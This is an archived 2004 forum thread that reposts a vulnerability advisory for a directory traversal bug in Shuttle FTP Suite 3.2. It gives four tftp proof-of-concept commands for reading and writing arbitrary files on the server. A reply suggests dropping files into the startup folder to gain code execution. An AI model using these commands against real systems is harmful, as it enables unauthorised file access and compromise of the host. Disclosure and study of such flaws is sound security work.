Shuttle Ftp Suite Lets Remote Users Read

Full Version: Shuttle Ftp Suite Lets Remote Users Read

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Aug 12 2004, 02:42 PM

QUOTE

Application: Shuttle FTP Suite
Web Site: http://www.waveflow.com/shuttleftp/
Versions: 3.2
Platform: Windows
Bug: Directory Traversal

1) Introduction
2) Bug
3) The Code
4) Fix

===============
1) Introduction
===============

Shuttle FTP Suite is the only Internet Suite that includes all these applications in one program.
It also has a very visual interface (similar to Windows Explorer) that makes it very easy to use.

======
2) Bug
======

Remote user can traverse the directory and retrieve And/Or write files on the system.

===========
3) The Code
===========

tftp -i [Server_IP] PUT [FileName] ../[FileName]

tftp -i [Server_IP] PUT [FileName] c:\[FileName]

tftp -i [Server_IP] GET ../[FileName]

tftp -i [Server_IP] GET c:\[FileName]

===========
4) The Fix
===========

Date of Vendor Notification:

02-08-04

Status:

No Response

Source: http://www.securitytracker.com/alerts/2004/Aug/1010929.html

Paul

Aug 12 2004, 04:27 PM

Hm, it could be hackable if ya place files in the startup folder/file.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.